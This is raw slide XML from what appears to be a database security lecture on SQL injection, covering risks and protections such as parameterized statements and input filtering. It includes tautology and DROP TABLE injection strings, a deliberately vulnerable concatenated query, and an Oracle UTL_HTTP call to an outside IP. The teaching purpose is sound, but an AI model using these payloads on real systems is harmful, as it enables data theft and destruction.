        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="9196348">
            <a:off x="6922099" y="4458494"/>
            <a:ext cx="230187" cy="407988"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49833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57354" name="向下箭號 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="7334982">
            <a:off x="6838936" y="5280819"/>
            <a:ext cx="230187" cy="407987"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49833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57355" name="向下箭號 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="7801899">
            <a:off x="6445250" y="6235700"/>
            <a:ext cx="230188" cy="407988"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49833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Code Injection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583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8E0650-276B-46E7-AAB2-1FD510343141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39713" y="1119188"/>
            <a:ext cx="8815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新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>statement = "SELECT * FROM users WHERE name = ' "+ userName +" ';" </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="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58373" name="矩形 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3122613" y="1695450"/>
            <a:ext cx="1487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 or '1'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'1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58374" name="矩形 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="585788" y="2352675"/>
            <a:ext cx="757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SELECT * FROM users WHERE name = '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' OR '1'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'1';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" baseline="0" dirty="0"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58375" name="矩形 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="603250" y="3657600"/>
            <a:ext cx="8221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SELECT * FROM users WHERE name = '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' OR '1'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'1'   /* ';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" baseline="0" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58376" name="矩形 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3122613" y="3044825"/>
            <a:ext cx="2056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 or '1'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'1'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/* '</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58377" name="矩形 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="239713" y="1695450"/>
            <a:ext cx="2944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If string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userName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 is:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58378" name="矩形 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="239713" y="3044825"/>
            <a:ext cx="29448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If string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userName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 is:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58379" name="直線接點 8"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3184525" y="2157413"/>
            <a:ext cx="1403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8380" name="直線接點 8"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5661432" y="2814638"/>
            <a:ext cx="15478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8381" name="直線接點 8"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5569154" y="4119563"/>
            <a:ext cx="21955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8382" name="直線接點 8"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3184525" y="3506788"/>
            <a:ext cx="2052638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Function Call Injection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>
          <a:xfrm>
            <a:off x="284163" y="1158875"/>
            <a:ext cx="8774112" cy="49403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A database function or operating system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function call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>is inserted into a vulnerable SQL statement to manipulate the data or make a privileged system call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr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dual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table is used in the FROM clause of SQL in Oracle when a user needs to run SQL that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does not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>logically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have a table name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SELECT SYSDATE FROM dual;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> SELECT TRANSLATE (‘user input’, ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>from_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>’, ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>to_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>’) FROM dual;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="808038" indent="-808038">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> SELECT TRANSLATE (“||UTL_HTTP.REQUEST (‘http://129.107.2.1/’)||”, ‘98765432’, ‘9876’) FROM dual;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
              <a:ea typeface="新細明體" charset="-12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BD641D-4598-45F9-9926-EA77E32C40C3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Function Call Injection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>
          <a:xfrm>
            <a:off x="236538" y="977900"/>
            <a:ext cx="8774112" cy="53943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TW" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>	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SELECT TRANSLATE (‘user input’, ‘from_string’, ‘to_string’) FROM dual;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>TRANSLATE is used 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replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> a string of characters with another string of characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>This type of SQL statement is subjected to a function injection attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>SELECT TRANSLATE (“||UTL_HTTP.REQUEST (‘http://129.107.2.1/’)||”, ‘98765432’, ‘9876’) FROM dual;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>The attacker can retrieve useful information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from the database server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>—located at the URL that is passed as a parameter—and send it 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the Web server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>(that calls the TRANSLATE function).</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:ea typeface="新細明體" charset="-120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55D50D-CD63-49FF-BB74-4DE4D570D324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Risks Associated with SQL Injection (1)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="284163" y="888841"/>
            <a:ext cx="8774112" cy="383857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Database Fingerprinting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Determine the type of database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>being used in the backend so that he can use database-specific attacks that correspond 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weaknesses in a particular DMBS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Denial of Service (DOS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Bypassing Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Identifying Injectable Parameters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The attacker gathers information about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type and structure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>of the back-end DB of a Web application.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This attack is made possible by the fact that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default error page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>returned by application servers is often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overly descriptive</a:t>
            </a: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69AAA3-B658-4720-91BA-3C677F8C8F62}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="群組 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1194821" y="5005388"/>
            <a:ext cx="6328656" cy="1768475"/>
            <a:chOff x="994934" y="4811713"/>
            <a:chExt cx="6328656" cy="1768475"/>
          </a:xfrm>
        </p:grpSpPr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578" y="4811713"/>
              <a:ext cx="5109012" cy="14966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5988678" y="6241634"/>
              <a:ext cx="1309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MS SQL 2000</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" b="1" baseline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04558" y="6202908"/>
              <a:ext cx="964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baseline="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>PHP 2.0</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" b="1" baseline="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94934" y="5175325"/>
              <a:ext cx="1219644" cy="9745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Risks Associated with SQL Injection (2)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr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>
          <a:xfrm>
            <a:off x="284163" y="1158875"/>
            <a:ext cx="8507412" cy="297815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Executing Remote Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>This provide attackers with a tool to execute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arbitrary commands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>on the DB.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Performing Privilege Escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>This type of attack takes advantage of logical flaws within the DB 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upgrade the access level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:ea typeface="新細明體" charset="-12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463BB8-F262-483B-9B87-5FB094865738}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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039" y="4130884"/>
            <a:ext cx="5365502" cy="1573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38789" y="4557872"/>
            <a:ext cx="1219644" cy="9745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>
          <a:xfrm>
            <a:off x="115888" y="122238"/>
            <a:ext cx="8942387" cy="712787"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Protection Techniques against SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" b="1">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63491" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="284163" y="887413"/>
            <a:ext cx="8602662" cy="4324350"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Bind Variables (Using Parameterized Statements)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/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000" dirty="0" err="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>PreparedStatement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stmt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dirty="0" err="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>conn.prepareStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>(“SELECT * FROM EMPLOYEE WHERE EMPLOYEE_ID=? AND PASSWORD=?”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/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err="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>stmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>employee_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-12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err="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>stmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>(2, password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Filtering Input (Input Validation)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remove escape characters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>from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input strings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>by using the SQL Replace function, e.g.,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single quote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>(‘) can be replaced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two single quotes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>(‘’).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Function Security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DB functions should be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restricted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, as they can be exploited in the SQL function injection attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
              <a:ea typeface="新細明體" charset="-12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BD7FC1-775C-4997-A636-DC47CB951193}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63493" name="群組 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="520932" y="5310185"/>
            <a:ext cx="7963060" cy="1027341"/>
            <a:chOff x="520910" y="5541109"/>
            <a:chExt cx="7962471" cy="1026731"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63494" name="矩形 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="578532" y="5921508"/>
              <a:ext cx="746271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1800" baseline="0" dirty="0">
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:rPr>
                <a:t>SELECT * FROM users WHERE name = '</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1800" baseline="0" dirty="0" err="1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a';DROP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1800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charset="-120"/>
                </a:rPr>
                <a:t> TABLE users; SELECT * FROM userinfo WHERE 't' = 't</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1800" baseline="0" dirty="0">
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:rPr>
                <a:t>'; </a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63495" name="矩形 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="586693" y="5541109"/>
              <a:ext cx="7896688" cy="36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TW" sz="1800" baseline="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新細明體" pitchFamily="18" charset="-120"/>
                </a:rPr>
                <a:t>statement = "SELECT * FROM users WHERE name = ' "+ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1800" baseline="0" dirty="0" err="1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新細明體" pitchFamily="18" charset="-120"/>
                </a:rPr>
                <a:t>userName</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1800" baseline="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新細明體" pitchFamily="18" charset="-120"/>
                </a:rPr>
                <a:t> +" ';" </a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800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63496" name="矩形 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="520910" y="5541110"/>
              <a:ext cx="7814229" cy="1026730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latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-12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536BF1-D3D0-4765-BC28-1C702C96E392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50"/>
            <a:ext cx="8774112" cy="884238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Control Measures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874713"/>
            <a:ext cx="8774112" cy="455771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charset="-120"/>
              </a:rPr>
              <a:t>Access Control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restricting access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>to the database 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handled by using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accounts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passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> to control login process by the DBMS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Inference Control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dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>To prevent from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deducing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certain facts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>concerning individuals from queries that involve only summary statistics on groups (or from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statistical databases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b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Statistical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ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>used to provide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statistical information or summaries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>of values based on various criteria.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17414" name="群組 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2232025" y="5676900"/>
            <a:ext cx="966788" cy="747713"/>
            <a:chOff x="3321050" y="5930900"/>
            <a:chExt cx="966788" cy="747713"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17420" name="圓柱 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3321050" y="5930900"/>
              <a:ext cx="966788" cy="747713"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050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17421" name="矩形 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3427761" y="6168702"/>
              <a:ext cx="71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Data</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17415" name="群組 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3514725" y="5535613"/>
            <a:ext cx="3276600" cy="906462"/>
